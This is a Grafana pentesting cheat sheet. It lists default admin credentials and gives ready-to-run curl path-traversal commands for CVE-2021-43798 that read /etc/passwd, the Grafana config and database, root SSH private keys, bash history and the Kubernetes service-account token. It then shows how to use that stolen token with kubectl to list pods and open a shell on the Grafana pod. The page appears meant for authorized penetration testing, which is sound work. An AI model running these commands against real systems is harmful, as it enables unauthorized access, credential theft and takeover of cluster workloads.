# Grafana Pentesting

Grafana is a multi-platform analytics and interactive visualization web application.

### Default Credential <a href="#default-credential" id="default-credential"></a>

```shellscript
admin:admin
admin:prom-operator
```

### Configuration File <a href="#configuration-file" id="configuration-file"></a>

The configuration file contains the admin credentials. See the “admin\_user” and “admin\_password” section in the file.

```shellscript
/etc/grafana/grafana.ini
```

### Path Traversal <a href="#path-traversal" id="path-traversal"></a>

```shellscript
curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../../../../../../../../etc/passwd -o passwd
curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../../../../../../../../etc/grafana/grafana.ini -o grafana.ini
curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db -o grafana.db
curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../../../../../../../../root/.ssh/id_rsa
curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../../../../../../../../root/.bash_history
curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../../../../../../../../home/grafana/.ssh/id_rsa
curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../../../../../../../../home/grafana/.bash_history
```

### Getting a Shell vis JWT, Grafana Pod <a href="#getting-a-shell-vis-jwt-grafana-pod" id="getting-a-shell-vis-jwt-grafana-pod"></a>

Some Grafana versions are vulnerable to Path Traversal. Kubernetes creates environment variables by default.

#### 1. Check Environment Variables on the Target Machine <a href="#id-1-check-environment-variables-on-the-target-machine" id="id-1-check-environment-variables-on-the-target-machine"></a>

```shellscript
env
```

If you got the GRAFANA environment like the following, the Grafana service is running on the cluster.

```
GRAFANA_SERVICE_HOST=10.108.133.228
GRAFANA_PORT=tcp://10.108.133.228:3000
GRAFANA_PORT_3000_TCP=tcp://10.108.133.228:3000
```

#### 2. Access the Grafana Dashboard <a href="#id-2-access-the-grafana-dashboard" id="id-2-access-the-grafana-dashboard"></a>

You can access the service at **http\://\\:\\**.

#### 3. Get the JWT of the Service Account <a href="#id-3-get-the-jwt-of-the-service-account" id="id-3-get-the-jwt-of-the-service-account"></a>

Using Path Traversal ([CVE-2021-43798](https://github.com/jas502n/Grafana-CVE-2021-43798)).

```shellscript
curl --path-as-is http://<grafana-ip>:<grafana-port>/public/plugins/alertlist/../../../../../../../../etc/passwd
```

Get the token (JWT) of the service account.

```
curl --path-as-is http://grafana:3000/public/plugins/alertlist/../../../../../../../../var/run/secrets/kubernetes.io/serviceaccount/token
```

#### 4. Decode the JWT and Get Sensitive Information <a href="#id-4-decode-the-jwt-and-get-sensitive-information" id="id-4-decode-the-jwt-and-get-sensitive-information"></a>

See [**JWT Pentesting**](https://exploit-notes.hdks.org/exploit/web/jwt/).

#### 5. Check Your Permission of This Service <a href="#id-5-check-your-permission-of-this-service" id="id-5-check-your-permission-of-this-service"></a>

Using the JWT, you should get permissions.

```shellscript
kubectl auth can-i --list --token=<Grafana-JWT>

# List pods
kubectl get pods --token=<JWT>
```

#### 6. Get a Shell on the Grafana Pod <a href="#id-6-get-a-shell-on-the-grafana-pod" id="id-6-get-a-shell-on-the-grafana-pod"></a>

```shellscript
kubectl exec -it <grafana-pod-name> --token=<Grafana-JWT> -- /bin/bash
```